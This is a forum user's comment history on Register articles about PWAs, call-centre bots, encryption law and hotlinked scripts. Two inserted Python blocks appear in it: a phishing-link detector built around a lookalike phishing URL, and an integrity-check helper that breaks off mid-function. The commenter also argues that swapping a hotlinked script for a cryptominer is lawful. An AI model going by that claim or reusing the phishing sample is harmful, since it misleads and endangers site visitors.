* Posts by doublelayer

10339 publicly visible posts • joined 22 Feb 2018

When you see PWA, Microsoft and Google want you to think Programs With Attitude: Web app release tool tweaked

doublelayer Silver badge

Re: Am I the only one

"My thoughts were the opposite. PWAs don't have as much access to the hardware as native apps. Even when they eventually do, how is this different from native apps now?"

Let me count the ways. Um ... sorry, lost count somewhere around twenty-three and I should keep working. Fine, here's the short version:

Current mobile operating systems have put a lot of work into sandboxing apps. They don't all do it right, but they mostly try. Users can generally block certain permissions and it isn't trivial for an app to circumvent a denial and get the data anyway. Similarly, it's usually difficult to have one app suddenly start reading the resources of another app. That's unlikely to be the same for a web app, if only because all the sandboxing would have to be started again. Of course there will be protection from accessing the location permission, but will the permission system be as granular? Will it be secure against circumvention attempts? Will it include any sneaky access methods because Google is building it?

In addition, a web app has a very different security profile to a native one. Web apps tend to use a lot of libraries. Those libraries come from really nobody knows where, or sometimes we do know and we might feel better if we didn't. Each of those places can get modified to introduce new code. Since these are progressive, update frequently, move fast and break things apps, our devices would be pulling this new code down and starting to execute it. At least with a native app, the library has to get tampered with, pulled down for the build, and released to the traditional channels. That might not be a reassuring shield but at least there's a shield.

Another issue is with privacy. Theoretically, analyzing network traffic from a web app isn't more complicated than with a native app. In practice, it's trickier. If you are able to intercept apps' traffic to block it, a web app can more easily disguise itself as a browser. Since the app needs to stay up to date, it must ping a server all the time, and because devs are lazy, there is a reasonable chance that it will require a server to function properly. While any app can require a server, it's more likely that a native app which cannot pull libraries from a server will function without one than one which requires a server pushing libraries for installation.

That's the short version. I should probably stop writing now.

You call Verizon. A Google bot answers. You demand a human. The human is told what to say by the bot

doublelayer Silver badge

Re: I can hear the conversations already

The problem is that, unless they operate the nice kind of call center, you are liable to finally get an operator after an hour of the same two advertisements on a loop to have this discussion:

Client: I am trying to activate a new phone online, but it says that the eSIM requires me to call for activation.

Operator: I will help you resolve this situation. First, may I have the phone number you are using to call us so we can call you back if needed?

Client: Sure. Here it is.

[...]

Operator: So you don't need help with your SIM card then?

Client: No, I need to activate a new device.

Operator: Well, I'm in the troubleshooting call center, but fortunately I can forward you to the activation call center. It'll just take a second.

Client: Thank you.

Advertisement starts again.

System: Good morning and thank you for calling Verizon. How can I help you?

doublelayer Silver badge

I can hear the conversations already

System: Good morning and thank you for calling Verizon customer support. How can I help you?

Client: I am trying to activate a new phone online, but it says that the eSIM requires me to call for activation.

System: I will help you resolve this situation. First, may I have the phone number you are using to call us so we can call you back if needed?

Client: Sure. Here it is.

System: And now your subscriber number?

Client: Here.

System: And your pin?

Client: Here.

System: Thank you. The SIM card slot is usually located on the side of your phone or in the battery compartment. You may notice a small hole.

Client: Wait a minute. I have an eSIM problem, not a SIM problem.

System: You can use a paper clip to eject the SIM card tray from your device, but make sure to turn it off before you do so. If there is an existing SIM card in the device,

Client: Stop. Cancel.

System: ... remove that card from the tray and insert your new Verizon SIM card.

Client: Other query. Help. Not my question.

System: There is a triangular cutout on the card which should align with the tray.

Client: If I wait it out, will it let me do something else?

System: If your SIM card is too large for the tray, you will need to break out the smaller card ...

Two minutes later:

System: Has this solved your problem?

Client: No.

System: I'm sorry to hear that. How can I help you?

Client: Activate new device.

System: I am capable of recognizing human language. Please phrase your request in full sentences.

Client: I am having trouble activating a new device.

System: I will help you resolve this situation. Is the number you are activating the same as the number you provided earlier? That number was two [long pause] four [long pause] eight [long pause]

Client: Of course not; I can't activate, so I have to call you from a working line.

System: six [long pause] zero [long pause] [...]

Client: [after number has been read] No.

System: May I have the number of the line you are trying to activate?

Client: Here.

System: Thank you. This line is not associated with any devices on your account.

Client: Right.

System: Has this solved your problem?

Client: No.

System: I'm sorry to hear that. How can I help you?

IBM job ad calls for 12 years’ experience with Kubernetes – which is six years old

doublelayer Silver badge

Re: Mandatory Experience

I have taken to reading the careers pages of sites I'm already on (note to employer: I'm not trying to find another job. I just like to see what they'll come out with). There was a role mentioned on one of these pages that specified that the candidate would need experience with "algebra and geometry". Weird, but they're being clear that mathematical knowledge is required. Except that they specified the specific things you needed to be able to do, including "find real roots of a parabola" and "calculate the volume of a cylinder". I have ever since been confident that, if something should go horribly wrong in my career, I can at least go over to the cylinder place and do quadratic formulas all day. It won't be interesting, but things are never hopeless.

doublelayer Silver badge

Re: Why wouldn't Tim Berners-Lee have 17 years experience designing websites?

That's part of it, and that does earn the interviewee a demerit. But the tweet contains three components if you ask me:

"We interviewed a 28yo designer in 2012 who told us he had 17 years experience designing websites.": Interviewee claimed to start designing sites at the age of 11 in 1995, which is possible but unlikely.

"I said, 'Tim Berners-Lee doesn’t have 17 years experience designing websites.'": This sounds to me as if the interviewer actually thought this was true. As it happens, it was not. If you count HTML websites on WWW, he had 21-22 years experience. If you count his previous work on CERN-specific pages that worked like websites with hypertext, it is even more.

And then the point about the interviewee not knowing who that was.

Detroit Police make second wrongful facial-recog arrest when another man is misidentified by software

doublelayer Silver badge

Re: The real news

That's not true. It happened. It really did. It was nine months ago in a private test somewhere in Europe. And they detected this guy entirely correctly. Well, he wasn't the guy they were looking for, but he was an identical twin with that guy, almost. I mean we put this guy in a lineup, brought in some people, and asked them to look at a picture and point out which of the people in the line was that guy. Everyone pointed at him except for a few of them, but those people didn't select anybody so they don't count.

Sueball locked, loaded and pointed at LinkedIn over iOS privacy naughtiness

doublelayer Silver badge

Re: I'm baffled

Well, it's not as simple as that because you may not always use the standard edit controls. In an app that implements a different edit box with different features, say for an actual word processor, you may want to be able to paste into your new area. Apple saw this need and implemented your basic clipboard where you could read at any time. Logically, they could easily have asked the user about whether the app was intended to be reading the clipboard, implemented rate limits, or various other security patches, but they didn't do that. Maybe their iOS 14 changes will include one or more of those preventative patches in addition to the retroactive warning mentioned.

doublelayer Silver badge

Re: I know not of these matters...

I think most of your statements are wrong there. We'll start with the first one. You can violate privacy without immediately sending the contents of the clipboard off. As a basic example, if you copied it into an internal buffer and used it to perform on-device metrics, even if you never sent those metrics, it could be violating the privacy of data stored in the clipboard. Sure, it's relatively low-level and users should be careful (that is assuming this app only did this while in the foreground), but don't assume that violating privacy requires phoning home. In this case, I don't think LinkedIn was using this as a sneaky data collection feature because it would be so fragile. I think it's more likely that some coder thought it would be useful and didn't think of alternatives or the downsides.

Now on to the code part. You say that checking the clipboard content "is absolutely required if you want to implement 'Paste' into anything other than text views and text fields." Not true, because you still only have to read from the clipboard when a user presses that button. The issue here is checking the content in a loop without any button. Then, you said that "you want to know what's in there so you don't have for example a 'Paste' button if there is stuff that you can't paste." I disagree, because I find hiding controls that you sometimes have and sometimes don't confuses the users, but that's a subjective UX thing. You can implement format-specific paste in a number of ways, including cancelling a paste operation without changing the original content if the contents are not compatible. You can warn the user or not as you desire.

"And then there's the fact that in Windows, Linux, MacOS, Android, and iOS up to 13.0, everyone does it. For good reasons."

You are assuming the reasons are good. Frequently, I find that good programs wait for me to paste in the contents of my clipboard rather than snatching potentially incorrect data out, though I will admit I've seen some go the other way.

Unless you really need real-time monitoring of clipboard contents for some reason, you are also making your application do a lot of pointless busy looping. This isn't great for performance or power usage if you do it for long enough.

An email banning our staff from using TikTok? Haha, funny story about that, we didn't mean it – Amazon

doublelayer Silver badge

Re: Another non-event distracting us

Exactly. That's why trust in the base app is such an important detail. The only relevance to the "pull down arbitrary code" possibility is that someone else could get the code inserted, either by forcing the company to do so, stealing the mechanism, or discovering a vulnerability. The new code would not be released as a potentially detectable update either, making it easier to hide.

I think the best example of such an issue is the vulnerability discovered in WhatsApp a little under a year ago. Said vulnerability wasn't intentional (unless you are paranoid), and it allowed arbitrary code execution by crafting an invalid video file. That code would not be able to exit the sandbox of the app, but WhatsApp's sandbox is really big so it proved to be a useful exploit, weaponized by at least a couple of groups. If TikTok had a similar mechanism intentionally or through a vuln, it could prove dangerous even if a user trusted the original app. Obviously, I do not know that such a thing exists, but if it did, it would be bad.

doublelayer Silver badge

Re: Another non-event distracting us

It wouldn't need root access to be able to do things you wouldn't like. I checked out its Exodus privacy report which shows information about permissions and trackers found in its Android app. That's quite a lot of permissions. Malware given access to those would be able to do lots of things, including making and inspecting network traffic. As with far too many Android apps, this app also requests permissions that don't seem to make any sense (install new packages, for example). From inside that sandbox, you can still do a lot.

Now, just because this app requests those permissions doesn't necessarily mean that all are granted or that they work. Nor does it mean that there is something malicious using them. I wouldn't be surprised to hear that TikTok does have a mechanism allowing their developers to push arbitrary code and run it. I also wouldn't be surprised to hear that Facebook has a method to push arbitrary code and run it. I already know that Google does have several ways to push arbitrary code and run it. As with any other application, the degree of trust in its developer and usefulness of the features must be taken into account before deciding whether to use it. I wouldn't trust it, but I also have no inclination to use it and there are already hundreds of other companies' apps that I also don't trust.

A volt from the blue: Samsung reportedly ditches wall-wart from future phones

doublelayer Silver badge

Re: 5v/12v ring

I suppose the question would then be why. Let's assume you could create secondary circuits at lower voltage. What would the benefit be of doing that? If you still provide the main circuit at normal voltage, your secondary circuit means extra installation, extra possibility for breaking, etc. without removing any of the cost associated with the main one. Meanwhile, providing the ability to use higher voltage may be useful in a limited number of circumstances. For example, most places could probably use LED bulbs at lower voltage (although how low is in question, see the other reply for details). However, some may wish to use a different type of bulb. I know some people use bulbs that release more ultraviolet light to promote vitamin D creation. I don't know if those have a higher power requirement. Most importantly, I don't know what other unusual types of bulbs people use, and I don't know if it's a good idea to make it more difficult for them to do so.

doublelayer Silver badge

Re: 5v/12v ring

"Agreed, but wondering what the load would actually look like though"

There are quite a few devices capable of drawing high power outside the kitchen (and I'm assuming you are also counting the laundry room and garage in the rooms needing higher power). There is of course the powerful desktop computer, especially a gaming or high-processing dev machine, probably one of the first to jump to mind for us on this forum. But there are other things, some with even higher draw. Printers, for example, can get pretty spiky. Portable heaters which are designed to quickly warm up the immediate area are also power hungry. Vacuum cleaners vary a lot, but I have not yet seen a USB vacuum capable of rapidly cleaning the floor. Fans may not be very hungry, but they will draw quite a bit of current if you run them at 5V. Televisions, speaker systems, and the like run with relatively little power, but high enough that running them together at low voltage is going to push the current level too high. Even laptops with large screens can charge at around 100W, usually through 20V USB-PD, which at 12V is a potentially undesirable 8.33A.

The problem is that there are potential users of increased power elsewhere in the house, so you will want to provide it. Probably relatively few people want to run an 800W GPU stack, but those who do will be annoyed if you take their mains availability away. Since we can easily step down to voltages at the point of the device, but stepping up is going to mean dangerous current draw, it is probably more efficient to leave sufficient voltage for more power hungry devices. If those voltages are never requested, little is lost.

doublelayer Silver badge

Re: You're funny

"last time a friend tried charging his iPhone here (last year's model) he found that with his genuine lead it refused to charge from the USB chargers that we use for our Samsung & Honor phones, in the end the only thing we found that would charge it was an old charger for a 1st generation iPad mini."

I really don't know about this. I have had iPhones, and they have charged off anything, up to and including a Raspberry Pi. I know I charged one off this really cheap plug next to me which is, let me check, a ZTE. I don't even know how I got a ZTE USB adapter, but it works fine on everything, so it remains in service.

The reluctant log trawler: The buck stops with the back-end

doublelayer Silver badge

Re: Late 2000s?

Why do you assume that "the 2000s" by default refers to a century? Because for all you know, it refers to a millennium. The only significant figure there is the 2, so any smaller chunk that still includes multiple years is valid, including 2000-2999, 2000-2099, 2000-2009, or for some pedants the 1-offset century and millennium as well. I choose to believe that this happened in the late 2000s, sometime around the year 2978, but the various changes in human culture since now have made it not as funny. Fortunately, they also invented time travel so someone could report it to us.

doublelayer Silver badge

Re: Fault at both sides

I very much agree. I was expecting to read that a user had realized that, by getting a quote with a different ID, they could trick the backend into purchasing stock at a different price and that a heist by a black hat was on the way. Verify all input from users; they are not to be trusted.

TomTom bill bomb: Why am I being charged for infotainment? I sold my car last year, rages Reg reader

doublelayer Silver badge

Re: Simpler than I expected

When you purchased your iPhone, did the manufacturer indicate that the contract for service was a component of the product? When you first got your iPhone, did you set up the contract on it as part of the process, or did you set up the contract with the mobile provider and connect the iPhone to it? Both of those things were different for this case. There was one other thing that was different, and that is that there wasn't any contract. This has been clarified by the original source several times above this in the comments: there was no contract, and the charge that TomTom sent out was not a valid charge.

doublelayer Silver badge

Re: New one on me

Come on. "I can math" has always in my experience been a lighthearted joke in one of two situations: someone expresses surprise at your having done some calculation quickly or when they didn't expect you to do it, or you have made a stupid mistake in mental arithmetic. It's used to juxtapose someone who doesn't know how to phrase that grammatically correctly with someone who is doing mental mathematics. As for "I logicked", I have heard that but very rarely and the grammatical way of saying the same thing: "I used logical thinking to come up with a solution" sounds pretty stupid too.

There are some people who seem to enjoy verbifying nouns, but it's usually sectors like PR or consultants who need new euphemisms or new things they are an expert in that nobody else has heard of so they must be good.

doublelayer Silver badge

Re: As I read that

"It wiped the car. It just didn't wipe Tom Tom's customer database, which is not in the car."

I get this distinction. When I first read it, I was inclined to agree with it. Having read information in other comments, however, I don't think the user is at fault here. It wiped the internal parts of the car. The car was sold with the TomTom device included, meaning that device was in the car at time of purchase. The device interacted with the main car display, meaning that a user could infer, incorrectly in this case, that it was connected to the car's systems and would also be reset on the activation of the wipe. That device didn't get reset or, if it did, didn't update the account it was connected to, to inform the account of the reset. And the user didn't have any repeated billing set up on that account. When the charge, wholly unexpected as it was TomTom's error, came through, it presumably indicated in some way that it was linked to that particular Mazda vehicle.

You could see why the original misconception was that Mazda could do something about this. They sold the equipment in the car, their screen controlled the equipment and was used to perform the reset, and the bill mentioned them. Now we know that that wasn't correct, and it wouldn't be fair to them to continue to blame them for much other than failing to warn of this possibility in the reset process. Still, given the limited information available at earlier points in the process, I think the concern was understandable.

Soft press keys for locked-down devs: Three new models of old school 60-key Happy Hacking 'board out next month

doublelayer Silver badge

Re: Alternatives?

If you go to your lots-of-items-selling site of choice, you can almost guarantee that you will find various budget mechanical keyboards around and even below your price range. I have experienced good results with some of these, but with each you will have some drawbacks. There are those who will not accept any switch type other than the well-known manufacturer they have used before, for example, and budget keyboards tend to use some manufacturer you've never heard of. I tend not to care, but if you do, the budget might not satisfy. Similarly, at that price range you are unlikely to find keyboards with extra features like Bluetooth, detachable cables, or extra ports. If one does contain such a feature, it's likely the only one.

Utilitarian, long-bodied Nokia 5.3 has budget basic specs - but it does cost £150

doublelayer Silver badge

Re: Got one of these recently

I found a couple low-priced options with removable batteries. I don't know if any are good though. Here's a search with the selected criteria being removable battery, 3.5 mm jack, 2019 or later, and at least 32 GB of internal storage to get rid of the "Go Edition" useless things.

doublelayer Silver badge

Re: Can we get a utilitarian tablet?

So you want a tablet with few inputs, bigger than a tablet, with no battery? An odd use case, I'd say, but you can probably manage it if you're willing to fiddle around. You could, for example, get a Surface, disconnect the camera (from a teardown it looks like that's doable), and run Android X86 on it. Or you could get a tablet meant to run Linux which has killswitches for all those things and do a bit of work to make Android run well on it. And I found some large, desktop-sized all-in-ones with Android on them from several years ago. Maybe one of those product lines still exists. But if you're asking why companies haven't built that device already, it's because it isn't very useful for people. Most users use tablets and touchscreen devices for portable, not desktop, use cases. So they make them smaller and with batteries.

Asia’s internet registry APNIC finds about 50 million unused IPv4 addresses behind the sofa

doublelayer Silver badge

Re: So, IPv4 addresses are like petroleum

Yes. In many ways they are like petroleum. There is a limited amount. Nobody is really sure when we will hit that limit but we have gotten far enough that there can be problems with the supply. Some groups control a massive amount for no good reason. Large parts of the world have next to none compared to their populations. There are replacements that might be useful if more people were to use them.

IPv6 has many problems, and making any change is difficult, but it is already chaotic to try to find and keep IPv4 addresses. This block may have reduced that pressure for a little bit, but in only one region of the world and only for so long. Given the aggressive CGNAT used in some parts of Asia, I imagine demand for these addresses will be fierce.

Microsoft sues coronavirus phishing spammers to seize their domains amid web app attacks against Office 354.5

doublelayer Silver badge

Re: Something about motes and beams...

"Are those dates in American MM/DD/YYYY format or UK DD/MM/YYYY format?"

Yes, indeed they are.

Sorry. I thought the question deserved that answer. I'll go now.

You may be distracted by the pandemic but FYI: US Senate panel OK's backdoors-by-the-backdoor EARN IT Act

doublelayer Silver badge

Re: States

Basically, you have a good understanding of the issue. Nothing is very clear. In general, if a state makes encryption illegal, then it is illegal for you to use encryption if you are physically in the state, to provide encryption to people in that state if you are not there, or to provide encryption to others using systems in that state. How much you care about each prohibition depends on what your state thinks about all this, your likelihood of going to the affected state, or whether you have money or other assets that state has the ability to go after. Federalism is weird sometimes.

doublelayer Silver badge

Re: Democrats

I thought that about the surveillance bills passed in the early 2000s. Then I stopped thinking that, which was good because it's painful to be wrong and I would have experienced that pain every year or so when they blindly reauthorized those powers, even as revelation after revelation came through about what those powers were being used for. Why should I believe that any politician, other than perhaps Senator Wyden, understands or cares about privacy and security? I have seen no evidence in favor and quite a bit of it against.

doublelayer Silver badge

Re: once the encryption is broken...

That's likely not how that would work. First, it requires tech companies, most or all of them, to choose altruism and privacy over profit and friends in government. They're already not willing to do that; why will they when it's even more painful? Most of the big companies don't really care much about encryption. They provide it some of the time, but mostly they don't bother. The primary exception among the giants is Apple, but Apple alone probably can't do much about this, especially as they don't run public online platforms anyway so they're safer than most from the effects.

Of course, if some company does decide to turn off a state for those reasons, that state will almost certainly find a way to go after them. They could, for example, sue them for violations if they can get any connection from that state to the encrypted system run outside it. States have power to arrest employees or get assets the company might have there, so if they want to force a company to comply with the law in one specific way, they have some tools they can use to try to make that happen.

doublelayer Silver badge

From the article, which presumably you read before getting here:

"Initial drafts of the law also contained two proposals that raised serious concerns from a broad range of groups and organizations. Firstly, the creation of a new 19-person committee that would be led by the Attorney General and dominated by law enforcement which would create content rules that tech companies would have to follow to retain legal protections. Secondly, and the suggestion that has security folks up in arms, is that those rules could require tech companies to provide Feds-only access to encrypted communications."

Summarized from later in the same article:

That panel: Still in the law. Still law enforcement.

That panel empowered to require backdoors: No.

Fifty state panels empowered: Yes.

Fifty state panels restricted from requiring backdoors: No.

Some state governments expressed interest in backdoors: Yes.

So some states could make encryption illegal: Yes.

So companies would have a patchwork approach: Yes.

Which would be really tricky and open them up to lawsuits: Yes.

Which companies like to avoid: Yes.

Easy solution to that: Don't offer encryption inside U.S.

doublelayer Silver badge

Re: We're all fucked....

"Once it affects those senators, then they'll realise the mistake they made."

I admire your optimism. I unfortunately cannot see them ever understanding what this does, even if they are directly targeted by it. Even if the person who breaks in puts a message box on their screen saying "I could do this because of the act you passed", they'll probably go on thinking that it made total sense. Now, in order to find the person who broke into my computer system, I am proposing we pass the Encryption Violations and Intelligent Law Act, which will allow law enforcement to access information during investigations without a warrant as long as a copy of that data, encrypted or not, has ever existed outside the house of the subject, on the basis that current law only requires a warrant to search the houses of subjects so data isn't included.

Trump's bright idea of kicking out foreign students unless unis resume in-person classes stuns tech, science world

doublelayer Silver badge

Let me let you in on a little secret. The world has a thing called time zones. It means that it's not the same time everywhere on the planet. As a completely random example, imagine that you are going to take an exam which starts at noon and lasts for two hours ... at the university's default campus on the eastern coast of the U.S. Since the university doesn't want students to record the exam as it shows up on their screen and send that to others, everyone has to take it at the same time. If you live in the eastern U.S., you take the test from 12:00-14:00. If the western U.S., it is 9:00-11:00. What if you live in India? It's 22:30-00:30 (10:30 PM to half past midnight). In China, that's 01:00-03:00. In the most populated time zone in Australia, 03:00-05:00.

Since university schedules tend to include morning and evening classes, anyone outside the Americas is virtually guaranteed to have to completely mess up their sleep schedule to take their classes if there's any real-time component (including taking tests, asking questions, participating in discussions, and many other very normal things for studying). For this reason alone, students may wish to take online courses in a similar time zone to the ones they're recorded in. And that's the most obvious pain point about trying to do a virtual education from the other side of the planet. There are many others.

doublelayer Silver badge

Re: Sometimes you just have to be there

I entirely agree. I think this applies to most of life, really. I've certainly noticed that some types of activities I did at the office are not working as efficiently now that I am at home, and my job is one of the most easily virtualized ones. Still, I know that it is not safe for me to return to the office, and if the U.S.'s trend continues, it may not be safe for students to return to universities in a month or two. Given this safety concern, there are only a few ways to deal with it.

You could just cancel classes and postpone them for a time when optimal learning conditions are available again. This would harm plenty of students who will have delayed entry into the job market and may not have the economic ability to do nothing for a semester. You could bring all the students to the campus with the ability to send them back home if something happens, but in addition to increasing the likelihood of something happening, you have also created a bunch of chaos if you do exercise the option of sending the students away. You could try a hybrid model where some students show up and some don't, which would probably be bad because those who do show up get all the benefits you listed in your comment while those who go virtual aren't the primary focus of the university's planning (as well as all the concerns about bringing everyone back just scaled down a bit).

While you raise valid points, nobody is doing this because they think it's better. They're doing it because the situation is dangerous.

UK government shakes magic money tree, finds $500m to buy a stake in struggling satellite firm OneWeb

doublelayer Silver badge

Re: It Could Be Made to Work ???

"But nobody from government has stood up and said why they've just spent half a billion on something out of the blue."

Well, technically, several people and documents from the U.K. government did say exactly why they bought it. It's just such a shame that basically none of them agree on what that reason was. This article quotes someone who says the reason is broadband. The article from a few days ago links to a report that says it's mostly navigation. Comments sections for both articles link to articles saying any number of other things.

doublelayer Silver badge

Re: It Could Be Made to Work ???

Well, that has several downsides. Basically, you're hoping to compare a lot of latencies between the satellites, requiring the device at the other end be informed of relatively large sets of data. That would make the system more delicate and require more data from the satellites. It would also make the system a lot more dependent on fixed ground locations, which isn't necessarily the most desirable setup. While those satellites are capable of broadband speeds, doing that would usually require larger receiving dishes and more power output. For things like ships and planes, you probably wouldn't find it that hard. For portable units used by field troops, that approach might be inadvisable. Still, if they intend to use the constellation for this purpose, they may find that my concerns are not that troubling. Still, if I were them and wanted to do the navigation with these satellites, I'd start by considering just putting the clocks in the ones that haven't yet been launched. They're planning to send thousands up; it's fine if 80 don't have clocks.

doublelayer Silver badge

Re: It Could Be Made to Work ???

Phone chipsets rarely support additional services that weren't around when the chip was designed. No matter how a new navigation system is implemented, whether almost identical to GPS or entirely different, a new chip will be needed to receive from it. The only exception would be a system which augments an existing one, similar to how QZSS overlays upon GPS for Japan. As for the clocks, that would be a problem. While they could put the clocks in the new satellites and reprogram them, they could have also put clocks in their own satellites without buying this company. While a navigation system isn't impossible, it would seem to be a strange step to take if that was the primary goal. Given their discussion of broadband, perhaps they have other goals in mind. Whether those goals make sense or are in any way useful is another question.

Three UK: We're sending you this SMS to warn you not to pay attention to unsolicited texts

doublelayer Silver badge

Re: Typical

I recently got an email after trying to log in to an online service. It started well:

"We noticed your login attempt seems unusual. To confirm that it is you, please enter the following code in the verification box: ..."

And then things turned for the worse:

"If you didn't attempt to log in, you should reset your password immediately." [reset your password is a link, and it goes to a subdomain of the original service]

While it could be worse and go through some other domain, this is still a perfect setup for a phishing email. I could just copy this directly, change the link, and fire it off to thousands of other users. Maybe some day companies will realize that it's not a good idea to basically create the convincing phishing email for scammers.
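The pattern above (a genuine message whose wording can be copied wholesale, with only the link target swapped) is exactly what link checks have to catch. The following is an added example, not code from the commenter or from any service mentioned on the page: it pulls every href out of an HTML mail body and rejects any whose host is not the expected domain or a true subdomain of it. The domain names, the verification code and both message bodies are constructed for the example; the lookalike host in the clone is the classic trick where the real domain appears as a prefix of an attacker-controlled one.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _LinkCollector(HTMLParser):
    """Collect href targets from <a> tags in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value)


def extract_links(html):
    parser = _LinkCollector()
    parser.feed(html)
    return parser.hrefs


def host_belongs_to(url, expected_domain):
    """True only if the URL is http(s) and its host is expected_domain or a subdomain of it.

    The '.' prefix in the endswith check matters: without it,
    example-service.com.login-verify.example would pass.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    expected = expected_domain.lower().rstrip(".")
    return host == expected or host.endswith("." + expected)


def naive_contains_check(url, expected_domain):
    """The check people write first; shown only to demonstrate how it is fooled."""
    return expected_domain in url


def suspicious_links(html, expected_domain):
    """Return the links in the message that do not stay on the sender's domain."""
    return [u for u in extract_links(html) if not host_belongs_to(u, expected_domain)]


# Constructed sample bodies (hypothetical domain example-service.com).
GENUINE = """<p>We noticed your login attempt seems unusual. To confirm that it is you,
please enter the following code in the verification box: 481516</p>
<p>If you didn't attempt to log in, you should
<a href="https://account.example-service.com/reset">reset your password</a> immediately.</p>"""

CLONE_LINK = "https://account.example-service.com.login-verify.example/reset"
CLONE = GENUINE.replace("https://account.example-service.com/reset", CLONE_LINK)

if __name__ == "__main__":
    print("genuine:", suspicious_links(GENUINE, "example-service.com"))
    print("clone:  ", suspicious_links(CLONE, "example-service.com"))
    print("naive check fooled:", naive_contains_check(CLONE_LINK, "example-service.com"))
```

The host comparison is the whole point: the genuine mail's link is on a subdomain of the service and passes, the clone's link passes the substring check but fails the suffix check. A real mail gateway would also resolve display text against href and treat non-http schemes as hostile, which `host_belongs_to` already does for the latter.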

Barclays Bank appeared to be using the Wayback Machine as a 'CDN' for some Javascript

doublelayer Silver badge

Re: Liability

I do not claim that I am guaranteed a victory, or that they will accept one outcome over another. Any group with money can decide to use the law to cause pain to someone else. I am well aware of this. You are correct that I focused instead on right and wrong, or rather I concern myself with what is legal or illegal. To me, that was the relevant question, rather than what lawyers can do if they feel vindictive. Since lawyers can be used vindictively in a number of circumstances, it seemed to be supposition and rather useless supposition at that.

Anything you did in this theoretical situation could cause a litigious organization to go after you. Introducing a cryptominer: "Causing harm to our users". Changing the script to write "The site you're using didn't code properly and is pulling data from another possibly insecure site": "Defaming the organization". Blocking the script, meaning the page doesn't load right: "Deliberately impeding the functioning of the system". And those are ignoring the high likelihood that they might try to argue that making any change counts as tampering with their computer system. The only solution unlikely to anger someone is to call them and request they change it back. Which will almost certainly anger nobody as you won't get anyone to answer your call.

In a situation where I discover that someone's doing this, I'm not going to insert a cryptominer. I'm too lazy for that. It's not because I'm worried about their lawyers. As I see it, their lawyers are basically as likely to go after me no matter what I do.

doublelayer Silver badge

Re: Liability

Yes, you can switch an image in such a way that you are in the wrong. It's not because you switched the image. It's because the image you switched to is illegal, meaning you are guilty of possessing an illegal image and of trying to distribute it. You can claim maliciousness on any switch, but the fact remains that it's not their image to retrieve. It does not matter what it was or what it switched to; they have no legal claim.

For example, let's consider part of your comment:

"unless you switched the file with malicious intent, meaning to cause harm, inconvenience, punishment."

The most open of those words is inconvenience. The problem is that, although anything I change is inconvenient, they don't have any right to convenience on that basis. They are using my bandwidth without permission. It is similar to if they ran their corporate network off my WiFi from next door without permission. If I found out and changed the password, they would be inconvenienced. However, they would not have the right to recompense for that because the inconvenience they received was a direct result of their doing something they do not have a right to do. I did not guarantee that I would keep my WiFi up, nor did I guarantee that my server would stay up, nor did I guarantee that I wouldn't change files.

The same argument applies to harm. If they connected a device to my WiFi that would cause harm if it lost network connection, and when I changed the password it did cause harm, that is not my responsibility. They exposed the victim to harm by making it rely on something they didn't have a right to use. That is, at the very least, negligence. I don't think most courts would stop there either.

doublelayer Silver badge

Re: Liability

"Lets say you were hosting a copy of (say) jQuery. Then, you notice that Barclays have hotlinked it into their own site. If you now come along and stick a crypto-miner into that file, you're opening yourself up for a world of hurt."

If I want to make a script on my page with a cryptominer, I am allowed to do so. If I call that file JQuery.js, I am allowed to do that. If I edit JQuery, I am allowed to do that (MIT license). So the only way they would have a legal claim is if I agreed to host it for them. Otherwise, I have never made any guarantee that the file would remain what they saw at one point. I can argue that I did not know they were linking to the file, and they would have no proof that I knew that. I can argue that they were violating my terms of service by linking to the file, and if I did edit my ToS accordingly I would have a better case than they would. I don't need to claim either of those things in order to have the right.

The issue of a powerful place using legal might to harm people they don't like, even when they have no legal basis to their attacks, is accurate. However, it's also possible for them to do this for anything else. If they hotlinked to a file and I changed it to indicate they used it without permission, they could get angry. If I blocked their request, they could similarly get angry. If they felt the need, they could have their lawyers sue me for breaking their service. However, if I blocked, edited to print a string, or edited to introduce a miner, I have the same rights to do what I have done and they have no basis to win the case.

doublelayer Silver badge

Re: Liability

If they have hotlinked to your site because you are providing them a service, then there is a terms of service document describing who is responsible and potential penalties in various situations. Under GDPR, your site would be a data processor and both you and the original site would need to ensure legal handling of the data provided to you. If you violated that, data protection authorities can go after you, even if it was through another site that the data came to you.

If they link to you without permission, then you are not responsible. Well, that depends--if you log information you know to be personal information when you know you have no right to it, data protection can still go after you. But for most other things, you don't have any responsibility. If you want to host scripts that nobody else would want on your site, you are allowed to do so. For example, cryptomining scripts are not illegal, so you can put them up if you wish. If someone decides to link to a file and you switch it to a different file, that's their problem. Any liability would be on them because their site, not yours, was the one deciding what the user gets, and it was their choice to include a script their users don't like.

doublelayer Silver badge

Well, many businesses want someone's head because it's an easy way to make it look like they've done something: "The employee responsible was fired [and therefore the person who should have detected and prevented won't be]". But there's various times when it's the right response. I don't know how or why this particular error happened. However, if it was somehow done intentionally, it's a very obviously bad thing to do. Someone who decides to use a compromisable third party without any guarantee of security or functionality might not be the best coder out there.

Yes, there are lots of things that can fall into that bucket, but this is worse than most of them. For example, although pulling code directly from NPM is similarly dangerous, people at least expect that it happens and do some types of automatic security checks on new releases. Nobody's going to do that for the Internet Archive. Also, most places from which external scripts are retrieved at least expect that to happen and have made statements about keeping their server up. I don't think the Archive has ever indicated they are willing to be used as a CDN and they can delete files or edit them at any time without notice.

So, if you have a sufficiently worrying practice being intentionally used, you have to wonder whether you will catch them if they do something like that again. That isn't necessarily a reason to immediately fire someone, but if you have alternatives, and the current job market means you probably do, it's a thing worth considering. A good company won't fire people for honest accidents, but negligence or intentionally doing something stupid are potentially worth it.
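The thread's underlying problem is a script loaded from a host that can change or delete the file at any time. The standard browser-side control for that is Subresource Integrity: the page carries a hash of the script it expects, and the browser refuses to run anything else, so a silent change becomes a visible load failure rather than arbitrary code running on the bank's origin. The following is an added example, not code from the commenter, from Barclays or from the Internet Archive: it generates the `integrity` attribute value in the format the SRI specification defines (`<algorithm>-<base64 digest>`) and verifies fetched bytes against it, including the spec's rule that when several hashes are listed only the strongest algorithm counts. The script contents are constructed for the example.

```python
import base64
import hashlib
import hmac

_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_integrity(content: bytes, algorithm: str = "sha384") -> str:
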